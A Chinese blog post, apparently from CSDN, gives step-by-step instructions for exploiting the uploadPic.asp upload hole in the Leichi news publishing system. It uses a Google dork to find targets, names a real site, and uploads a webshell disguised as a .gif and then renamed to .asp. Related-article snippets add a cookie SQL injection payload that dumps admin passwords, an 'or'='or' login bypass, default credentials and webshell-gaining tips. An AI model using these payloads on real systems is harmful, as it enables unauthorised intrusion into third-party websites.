雷池新闻发布系统uploadPic.asp漏洞

最新推荐文章于 2024-10-22 12:37:29 发布
原创 最新推荐文章于 2024-10-22 12:37:29 发布 · 5k 阅读 · 0 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#google

本文介绍了一种通过修改URL参数并上传伪装文件的方法来利用网站漏洞的过程。具体步骤包括搜索特定目录结构、更改URL以指向上传脚本、上传带有恶意代码的小文件及最终的大文件。

1.在Google搜关键字:inurl:leichinews

2.找到以下网址,如:http://www.13lang.com/leichinews/onews.asp?id=71

3.我们把leichinews/后面的改成admin/uploadPic.asp?actionType=mod&picName=13lang.asp 提交

4.把我们的小马改成.gif后缀上传,如13lang.gif

5.访问http://www.13lang.com/leichinews/uppic/13lang.asp   

呵呵,之后就是上传我们的大马吧

 
信息收集
qq_42980938的博客
10-28 5072
信息收集大全 google 语法  "" 双引号的内容不可拆分 site 指定域名 lnurl url存在的关键网页 lntext 网页正文中的关键字 Filetle 指定文件类型 lntitle 网页标题关键字 —————————————————————————————— 经常运用 搜索敏感文件 site:xxx.com filetype:doc intext:pass site:xxx.com...
leichinewsv1.0.zip
03-21
asp码源,版本较老,可用Windows2003搭建环境,可用于web安全各种漏洞测试
雷驰新闻发布管理系统 v3.0
03-25
最新3.0版新增功能:   1、修复sql注入 2、解决'or'='or' 3、增加全部新闻 4、合并友情连接数据库 后台管理登陆文件:admin/adminlogin.asp 后台管理用户名和密码都是admin
突破雷池上传漏洞补丁
怪才技术家园
04-16 1843
某日一人叫我拿几个站发现都有打了补丁的雷池,后来偶然间看了看代码,遂有此文以下是雷池上传的介绍==========================================假如雷池的上传文件uploadPic.asp在admin目录下即admin/uploadPic.asp那么我们可以这样利用漏洞:在浏览器中输入:http://www.xxxx.com/admin/uploadPic.asp
雷驰新闻系统 v3.0.rar
07-05
1,新闻栏目二级分类,随意修改,管理员分级管理 2,采用强大的HTML编辑器输入新闻文章 3,不存在任何新闻内容不能分段,不出空格的问题 4,可以直接复制任何图文信息,输出和原来格式一模一样 5,前台使用JS随意调用新闻 6,支持图片新闻,无组件上传图片到数据库,前台JS调用 v3.0更新: 1、修复sql注入 2、解决'or'='or' 3、增加全部新闻 4、合并友情连接数据库 v2.0版新增功能: 1.加入防注入 2.完善程序所在不同目录造成的首页调用后点击报错 3.加入友情连接,link/admin.asp登陆,密码为admin,link/db_inc.asp这个页面可以控制修改密码! 4.加入相关评论 后台管理登陆文件:admin/adminlogin.asp 后台管理用户名和密码都是admin
用ajax实现新闻发布系统
07-23
新闻发布系统,用ajax实现的,希望对你们有用 开发思路: jdbc访问层 ----> Dao增删查改 ----> servlet放置方法的调用以及参数等
【亲测免费】 快速搭建新闻发布平台:ThinkPHP新闻发布系统
最新发布
gitblog_09772的博客
10-22 764
快速搭建新闻发布平台:ThinkPHP新闻发布系统 【下载地址】ThinkPHP新闻发布系统前台后台易学易用 本仓库提供了一个基于ThinkPHP框架的新闻发布系统源码,包含前台和后台功能。该系统设计简洁,易于学习和使用,特别适合初学者和需要快速搭建新闻发布平台的开发者。后台功能强大,能够方便地进行文章的发布和管理 ...
雷池demo 漏洞事件分析
m0_64777251的博客
04-12 1110
访问备份或临时文件的请求解码请求报文bak 备份文件访问phpadmin默认后台路径。
【CyberSecurityLearning 60】ACCESS数据库的注入+ACCESS数据库的cookie注入
_Co1a
04-08 2593
目录 ACCESS注入 雷驰新闻系统v1.0环境搭建: ACCESS数据库注入演示1: 雷驰新闻系统v3.0环境搭建: cookie注入演示2: ACCESS数据库注入用sqlmap怎么做?演示: ACCESS注入 雷驰新闻系统v1.0源码下载(leichinewsv1.0.zip):https://www.onlinedown.net/soft/136.htm 雷驰新闻系统v3.0源码下载(leichinewsv3.0.rar):http://down.chinaz.com/...
Web 渗透测试思路总结
热门推荐
Aka1Sz
10-13 2万+
1.无论什么站,无论什么语言,我要渗透,第一件事就是扫目录,最好一下扫出个上传点,直接上传shell,诸位不要笑,有时候你花很久搞一个站,最后发现有个现成的上传点,而且很容易猜到,不过这种情况发生在asp居多!   2.aspaspx)+MSSQL先考虑注入,一般的注入都有DBowner权限可以直接写shell;如果写不了,或者web与数据库分离,那就猜数据,从后台下手了,后台可以上传或者
雷驰新闻发布管理系统v3.0漏洞很简单 (转)
花开的声音(Mr’yan的技术集)
10-16 2092
第一个就是得到管理员的密码和用户名。。 在http://127.0.0.1/otype.asp?owen1=文体新闻 加上下面的一段COOKIES。。 owen2=娱乐新闻' and 1=2 union select 1,admin,3,4,5,6,7,8,password,10,11 from admin where 1<2 and ''='(注
leichinewsv3.0.rar
03-21
asp码源,版本较老,可用Windows2003搭建环境,用以web安全测试
雷驰系统总结
07-17 728
注:本文主要总结雷池三个版本的几个漏洞并简单说下拿shell,善于总结进步才快。呵呵,本文献给和我一样的小菜,高手掠过!初学asp,有错请提出~谢谢!一、’or’=’or’漏洞1.漏洞分析漏洞文件当然在后台验证文件上,/admin/CHKLOGIN.ASP中,见代码4-7行:dim rsadmin1=request("admin") ‘没有任何过滤password1=request("p...
十年前的web小子
whatday的专栏
03-11 3236
高中接触web检测 直至大学才算入门 发表一下当时的学习总结 纪念一下十年的岁月 以下是正文: 独孤九剑,有进无退,招招都是进攻,攻敌之不得不守,自己当然不用守了。创制这套剑法的独孤求败前辈,名字叫做“求败”,他毕生想求一败而不可得,这剑法施展出来,天下无敌。      欲炼此功,必先掌握ASP,PHP,JSP,HTML,SQL。        独孤九剑的第一招“总诀式
拿webshell权限的45种方法
寒冬玉
03-24 2万+
1, 到GoogLe,搜索一些关键字,edit.asp? 韩国肉鸡为多,多数为MSSQL数据库! 2, 到Google ,site:cq.cn inurl:asp 3, 利用挖掘鸡和一个ASP木马. 文件名是login.asp 路径组是/manage/ 关键词是went.asp 用or=or来登陆 4, 关键字:Co Net MIB Ver 1.0网站后台管理系统 帐号密码为 or=
[ssh新闻发布系统一]搭建开发环境
逸轩
03-18 1669
从零开始基于struts2.3、hibernate4.3、spring4.2实现新闻发布系统。下面开始搭建开发环境,主要包括 安装eclipse插件下载jar包配置struts、spring、hibernate 一、安装eclipse插件 在eclipse导航栏依次找到help->eclipse market。 输入hibernate搜索hibernate tools工具,
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值